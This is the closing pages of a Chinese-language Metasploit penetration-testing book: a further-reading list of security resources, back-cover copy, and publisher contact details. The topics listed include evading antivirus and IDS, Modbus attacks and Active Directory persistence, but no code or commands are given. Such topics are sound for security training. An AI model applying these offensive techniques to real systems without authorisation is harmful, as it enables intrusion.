工具 和 技术 的 速 查 手册 。 


























12.10 ”延伸 阅读 


在 本 书 中 ， 我 们 从 实践 的 角度 讲解 了 Metasploit 以 及 各 种 相关 内 容 。 我 们 讨论 了 漏洞 渗透 、 模 块 
开发 、 向 Metasploit 移植 渗透 模块 、 客 户 端 攻 击 、 基 于 服务 的 渗透 测试 、 规 避 技 术 、 执 法 机 构 所 采用 
的 技术 ， 以 及 Armitage 等 。 另 外 也 讲解 了 Ruby 编程 的 基础 知识 和 Armitage 中 的 Cortana。 

当 你 读 完 本 书 之 后 ， 如 果 还 想 要 进一步 扩展 的 话 ， 可 以 访问 如 下 资源 。 

口 如 果 想 学 习 Ruby 编程 ， 可 以 访问 http://ruby-doc.com/docs/ProgrammingRuby/。 

口 如 果 想 学 习 汇编 程序 ， 可 以 访问 https://github.com/jaspergould/awesome-asm。 

口 如 果 想 进一步 学 习 漏 洞 渗透 模块 的 开发 ， 可 以 访问 https://www.corelan.be/。 

口 如 果 想 学 习 Metasploit 开发 ， 可 以 访问 https://github.com/rapid7/metasploit-framework/wiki o 

口 如 果 想 学 习 基于 SCADA 的 渗透 测试 ， 可 以 访问 https://scadahacker.com/。 

口 https:/www.offensive-security.com/metasploit-unleashed/ 提 供 了 详细 讲解 Metasploit 攻击 技术 的 
文档 。 
口 如 果 想 进一步 学 习 Cortana 编程 技术 ， 可 以 访问 http://www.fastandeasyhacking.com/download/ 
cortana/cortana tutorial.pdf。 

O https://github.com/rsmudge/cortana-scripts 提供 了 很 多 Cortana 编程 技术 的 资源 。 
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近年 来 ， 渗 透 测试 已 成 为 网 络 安全 研究 的 核心 问题 之 一 ， 而 Metasploit 是 目前 业内 广泛 使 用 的 渗透 测试 框 
架 ， 拥 有 很 多 创新 特性 。 本 书 是 使 用 Metasploit 进 行 渗透 测试 的 实用 指南 ， 立 足 真 实 案例 ， 帮 助 读者 了 解 如 何 
使 用 Metasploit 进 行 高 效 渗透 测试 、 实 现 Web 应 用 程序 的 自动 化 攻击 、 提 升 安全 专业 技能 。 


第 3 版 新 增 了 关于 Metasploit 中 规避 技术 和 “特工 ”技术 的 章节 ， 阐 释 了 如 何 使 用 Metasploit 的 功能 绕 过 各 
种 高 级 防御 机 制 ， 介 绍 了 执法 机 构 专用 的 Metasploit 工 具 和 技术 ， 还 讲解 了 加 速 渗透 测试 和 高 效 使 用 
Metasploit 的 各 种 技巧 。 此 外 还 增加 了 Modbus 协 议 攻 击 、 渗 透 Active Directory 并 获取 持久 访问 权限 等 内 容 。 


€ 开发 高 级 、 复 杂 的 辅助 模块 
€ 将 用 Perl|、Python 等 语言 编写 的 模块 移植 到 Metasploit 框 架 中 
€ 对 数据 库 、SCADA 等 各 种 服务 进行 渗透 测试 
€ 利用 高 级 渗透 技术 对 客户 端 发 起 攻击 
€ 使 用 Metasploit 对 移动 设备 和 平板 电脑 进行 渗透 测试 
€ 使 用 Metasploit 绕 过 杀毒 软件 和 IDS 等 现代 防御 机 制 
€ 使 用 Armitage GUI 对 Web 服 务 器 和 系统 进行 模拟 攻击 
在 Armitage 中 使 用 Cortana 编 写 攻击 脚本 
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看 完了 


如 果 您 对 本 书 内 容 有 疑问 ， 可 发 邮件 至 contact@turingbook.com， 会 有 编辑 或 作 
译 者 协助 答疑 。 也 可 访问 图 灵 社 区 ， 参 与 本 书 讨论 。 


如 果 是 有 关 电 子 书 的 建议 或 问题 ， 请 联系 专用 客服 邮箱 : 


ebookQturingbook.com, 
在 这 可 以 找到 我 们 : 


微 博 @ 图 灵 教育 : 好 书 、 活 动 每 日 播报 

微 博 @ 图 灵 社 区 : 电子 书 和 好 文章 的 消息 

微 博 @ 图 灵 新 知 : 图 灵 教 育 的 科普 小 组 

微 信 图 灵 访 谈 : ituring_interview， 讲 述 码 农 精彩 人 生 
微 信 图 灵 教 育 : turingbooks 


